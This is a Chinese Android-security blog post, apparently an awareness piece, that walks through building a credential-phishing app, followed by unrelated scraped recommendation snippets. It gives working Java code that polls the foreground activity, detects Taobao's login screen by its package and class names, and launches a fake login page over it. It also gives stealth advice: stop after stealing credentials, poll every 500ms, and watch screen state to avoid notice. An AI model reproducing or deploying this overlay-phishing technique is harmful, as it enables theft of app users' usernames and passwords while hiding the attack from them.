导读:文本介绍一种钓鱼应用,讲述如何骗取用户的用户名和密码,无须root
这个话题是继续android安全问题(二) 程序锁延伸的
之前我已经展示了如何制作程序锁。当打开指定应用的时候,弹出一个密码页面。
程序锁的话题虽然是和安全相关,但是这应该属于防范的范围,如果被人恶意利用,那么后果……
这期我来揭示一下一种钓鱼程序的原理,希望广大用户不要上当受骗,最主要的是:希望大家意识到安全问
之前我用定时扫描activity的方法来检查打开的页面是不是我们所需要的页面
ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
如何用于钓鱼呢?比如我打开了淘宝,然后想登录,查看一下我淘宝,这时候会打开下面这个页面
从log中我们能得到其包和类的信息
log 写道
10-17 10:02:14.698: I/ActivityManager(246): Displayed com.taobao.taobao/com.taobao.tao.LoginActivity: +305ms
恩,这就好办了,下面我只需改三处,程序锁这个应用就会变成调用应用
第一个修改很简单,修改我们监听的包名和类名即可
String testPackageName = "com.taobao.taobao";
String testClassName = "com.taobao.tao.LoginActivity";
完整代码
public class LockTask extends TimerTask {
public static final String TAG = "LockTask";
private Context mContext;
String testPackageName = "com.taobao.taobao";
String testClassName = "com.taobao.tao.LoginActivity";
private ActivityManager mActivityManager;
public LockTask(Context context) {
mContext = context;
mActivityManager = (ActivityManager) context.getSystemService("activity");
}
@Override
public void run() {
ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
String packageName = topActivity.getPackageName();
String className = topActivity.getClassName();
Log.v(TAG, "packageName" + packageName);
Log.v(TAG, "className" + className);
if (testPackageName.equals(packageName)
&& testClassName.equals(className)) {
Intent intent = new Intent();
intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
mContext.startActivity(intent);
}
}
}
第二个修改有些技术含量,可能会需要一个专业的美工,来仿造一个淘宝的登录页面,就如上图所示的那样
最后一个修改,当病毒获取了用户名和密码之后,就不要再继续监听了,不然次数多了肯定会被发现
为了尽量不让用户察觉,可以把频率调高一些,比如500ms检查一次,这样用户就很难察觉了
测试项目完整源码见附件,代码是以android4.0为基础写的(当然,我的钓鱼页面是简陋的,只是用于演示)
无论是程序锁还是钓鱼程序,他们可能都担心耗电问题,因为耗电过多也会引起用户的注意
我们可以降低检查频率(当然,钓鱼程序是不会这么干的)
我们可以监控屏幕状态,当屏幕关闭的时候,我们可以停止监听,这时候也没有必要监听,当点亮的时候我们再监听
如何监听屏幕状态?
我们需要监听下面两个action
Intent.ACTION_SCREEN_OFF
Intent.ACTION_SCREEN_ON
还有一个要求,就是要动态注册才可以,不能在manifest中注册
其余的事情大家就自己实现吧
android手机root后的安全问题 (一)
android手机root后的安全问题 (二)
android手机root后的安全问题 (三)
android手机root后的安全问题 (四)
android安全问题(一) 静音拍照与被拍
android安全问题(二) 程序锁
android安全问题(三) 钓鱼程序
android安全问题(四) 抢先开机启动 - 结果篇
android安全问题(五) 抢先拦截短信 - 结果篇
请大家不要用root的手机随意下载软件,更不要以任何借口制造任何病毒!
转贴请保留以下链接
本人blog地址
http://su1216.iteye.com/
http://blog.csdn.net/su1216/
分享到:
相关推荐
三、 手机系统安全性与用户性别的相关性 第二章 ANDROID 手机预装软件 一、 应用软件预置概况 二、 预置应用软件监测情况分析 第三章 ANDROID 手机 APP 隐私获取 一、 非游戏类 A PP 获取核心隐私权限及越界行为减少...
通过将您的单点登录凭据输入第三方应用程序,您可能会面临网络钓鱼攻击的风险。 这个应用程序是完全开源的,除了访问网络顾问本身所必需的那些之外,不进行网络调用。 此应用程序没有后端,所有数据处理均在设备上...
WiFi Analyzer被评为Android上15个最有用的应用程序之一 将WiFi Analyzer评为修复WiFi的最佳应用之一 中WiFi分析器–最佳Wi-fi路由器 这是WiFi Analyzer的官方存储库。 目录 产品特点 识别附近的接入点 图形通道...
卡巴斯基平板安全软件全面保护您的Android平板电脑及其存储的隐私信息安全,它提供的高级反盗窃功能,可以帮助您锁定和定位丢失或被盗的平板电脑、清除其中存储的个人信息,并可秘密拍摄窃贼的面部照片。此外,实时...
java收费直播源码工具 网络安全工具 SecTools.Org:排名前 125 的网络安全工具 - 十多年来,Nmap ...应用程序安全扫描器自动发现安全漏洞。 - 与 Metasploit 集成的商业漏洞和风险管理评估引擎,由 Ra
来自AVG Mobilation的免费杀毒 – 专注于Android平台的安全软件。 为您的设备提供一键式安全保护。 AVG Mobilation手机安全软件(免费杀毒)实时保护您远离病毒、恶意程序及漏洞。 来自AVG Mobilation的免费杀毒 –...
更新检查可确保会使用最新版的安全性功能与修正程序,浏览器自动更新新的版本,不需要用户采取任何动作,更新后会在下一次启动中自动使用。 专业测评 HTML5测试 HTML5测试(3张) CSS3测评 Acid1及Acid2均顺利...
安全钓鱼 海上地理灾害跟踪系统 一种移动应用程序,可通知渔民世界海洋中倾倒化学武器和弹药的地区。 需要Android 4.0.3及更高版本。 专为 ###关于 在过去的一个世纪中,人们一直在向世界各地的海洋倾倒有害...
Google Chrome是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。 软件的名称来自称作Chrome的网络浏览器GUI...
借助Speed Tracer,您可以更好地了解在应用程序中的哪些地方消耗了时间,并可以解决JavaScript语法分析和执行、CSS式样以及更多方面的问题。 Resolution Test,它可以改变浏览器窗口大小,从而使网站开发者可以在...
将先进的课堂 PC监视、实时演示和加注工具同创新型客制化测验套件、互联网和应用程序控制、实时音频监听、自动化课程设计、打印机管理、即时通讯控制、内容监控及桌面安全等功能结合起来,可以完全应对和满足当今...
WhaleVault是一种更好,更安全的跨链方式,可以从基于Chrome的浏览器(包括Brave Desktop,Opera Desktop,Yandex Mobile Android和Kiwi Mobile Android)访问石墨烯帐户,现在也可以从Firefox访问。 开箱即用地支持...